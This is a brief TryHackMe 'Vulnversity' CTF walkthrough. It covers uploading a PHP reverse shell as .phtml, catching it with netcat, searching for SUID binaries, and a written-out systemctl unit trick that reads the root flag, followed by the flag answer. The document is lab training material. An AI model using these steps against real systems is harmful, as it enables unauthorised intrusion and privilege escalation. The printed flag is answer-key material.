TryHackMe Vulnversity part-2
CTF Writeup
Hello guys, In this blog we are going to see about vulnversity part 2 walkthrough.
Let’s get into part 2 of the Vulnversity challenge. After gathering the directory/internal and there is an option to upload the reverse_shell.phtml change PHP into PHTML. Make changes to your IP to file and port number.
After uploading the reverse shell there is a reverse shell we need to look into the page that file uploaded for that again we use gobuster.
From the screenshot, we came to know that /uploads file found.
Then start the listener i.e “nc -lvnp port “ and click the file that was uploaded on the webserver.
You will get a remote shell by doing this.
After gaining of shell you need to look for a user flag.
Inorder to look for SUID files you have to use command:
find / -user root -perm -4000 -exec ls -ldb {} \;
Then you will find /bin/systemctl. With the help of GTFObins, you will exploit /bin/systemctl and get into the root.
TF=$(mktemp).service
echo ‘[Service]
Type=oneshot
ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”
[Install]
WantedBy=multi-user.target’ > $TF
/bin/systemctl link $TF
/bin/systemctl enable — now $TF
This is used for geting flag from root.
ans: a58ff8579f0a9270368d33a9966c7fd5